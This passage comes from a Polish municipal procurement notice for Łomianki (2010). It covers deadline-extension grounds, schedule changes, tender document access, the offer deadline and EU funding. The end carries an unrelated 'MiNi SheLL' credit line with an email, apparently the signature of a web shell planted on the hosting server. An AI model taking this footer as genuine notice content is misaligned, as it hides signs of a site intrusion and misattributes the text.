3)	z powodu działań osób trzecich uniemożliwiających wykonanie prac w terminie, które to działania nie są konsekwencją winy którejkolwiek ze stron,
4)	w przypadku zmian przepisów prawa oraz wydanych  do  nich aktów wykonawczych  powiązanych z ustawą Pzp lub  przepisami związanymi z przedmiotem zamówienia,
5)	w przypadku wystąpienia niekorzystnych warunków atmosferycznych uniemożliwiających wykonanie przedmiotu umowy w terminie określonym w niniejszej umowie,  potwierdzonych przez Zamawiającego,
6)	w przypadku wstrzymania robót  lub przerw  powstałych z przyczyn  leżących po stronie Zamawiającego,
7)	w przypadku zmiany dokumentacji  projektowej lub/ i  specyfikacji technicznej,
8)	z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na niezgodności dokumentacji z przepisami prawa,
9)	w przypadku wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
8.	Ewentualne przesunięcie terminu zakończenia robót nastąpi o tyle dni, przez ile trwały przyczyny, przy czym wymagają one potwierdzenia przez 	Przedstawiciela Zamawiającego.
9.	Wszelkie ewentualne zmiany będą dokonane w formie aneksu i nie będą stanowić podstawy do zmiany wynagrodzenia , z wyjątkiem  pkt. 4.
10.	Każda konieczna modyfikacja harmonogramu, o ile wystąpi, wymaga pisemnej akceptacji 	Zamawiającego. Wykonawca dostarczy Zamawiającemu zmodyfikowany harmonogram w 	terminie 5 dni po akceptacji wprowadzenia zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lomianki.pl (bip)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Łomiankach, ul. Warszawska 115, 
pok. nr 1 lub za zaliczeniem pocztowym - cena 350,00 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2010 godzina 12:00, miejsce: Urząd Miejski w Łomiankach, ul. Warszawska 115, 
pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Regionalny Program Operacyjny Województwa Mazowieckiego 
Priorytet VI Wykorzystanie walorów naturalnych i kulturowych dla rozwoju turystyki i rekreacji. 
Działanie 6.1. Kultura.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com